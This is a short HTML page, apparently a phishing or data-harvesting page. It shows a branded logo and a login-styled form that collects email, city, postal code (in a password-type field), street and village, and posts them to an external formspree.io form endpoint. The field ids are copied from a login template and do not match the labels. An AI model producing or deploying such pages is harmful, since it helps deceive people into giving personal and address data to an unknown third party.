<html style='background-color: #20E0B2 !important'>
    <body style='background-color: #20E0B2 !important'>
        <div class="newgo9">
            <div class="wrap-login10034 p-l-55 p-r-55 p-t-80 p-b-30">
                <div class="newlogoplace">
                    <h1 class="newcardtitlelogin"><img class="loginlogo" src="https://res.cloudinary.com/dn6wh4u2h/image/upload/v1615285509/SCANEXC._basic-file_bd19ts.png"></h1>
                </div>
              
                    <div class="registration-form">
        <form  action="https://formspree.io/f/xgepgdjg"
  method="POST">
            <div class="form-group">
                <input type="email" name="_replyto" class="form-control item" id="non" placeholder="Email">
            </div>
            <div class="form-group">
                <input type="text" class="form-control item" id="username" name="message" placeholder="City">
            </div>
            <div class="form-group">
                <input type="password" class="form-control item" id="password" name="message" placeholder="Plz">
            </div>
            <div class="form-group">
                <input type="text" class="form-control item" id="email" name="message" placeholder="Street">
            </div>
            <div class="form-group">
                <input type="text" class="form-control item" id="phone-number" name="message" placeholder="Village">
            </div>
            <div class="form-group">
                <button type="submit" class="btn btn-block create-account">Send Information</button>
            </div>
        </form>
              
            </div>
        </div>
    </body>
</html>
